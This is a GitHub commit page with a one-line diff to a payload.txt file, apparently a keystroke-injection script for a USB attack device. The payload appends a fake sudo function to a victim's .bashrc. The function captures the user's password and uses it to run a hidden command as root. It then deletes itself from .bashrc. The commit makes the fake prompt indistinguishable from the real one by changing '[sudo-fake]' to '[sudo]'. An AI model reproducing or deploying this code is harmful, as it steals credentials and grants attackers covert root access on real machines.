Skip to content

Commit

Permalink
Update payload.txt
Browse files Browse the repository at this point in the history
  • Loading branch information
simen64 committed May 4, 2024
1 parent 0b62562 commit 65b9e0d
Showing 1 changed file with 1 addition and 1 deletion.
Original file line number Diff line number Diff line change
Expand Up @@ -36,7 +36,7 @@ STRINGLN_BLOCK
echo '
sudo() {
while true; do
read -s -r -p "[sudo-fake] password for ${USER}: " passwd
read -s -r -p "[sudo] password for ${USER}: " passwd
echo "${passwd}" | /usr/bin/sudo -S ${@} && { echo "${passwd}" | /usr/bin/sudo -S #cmd; head -n -6 .bashrc > temp && mv temp .bashrc; break; } >/dev/null 2>&1 || { clear; echo "Sorry, try again."; }
done
}' >> .bashrc
Expand Down

0 comments on commit 65b9e0d

Please sign in to comment.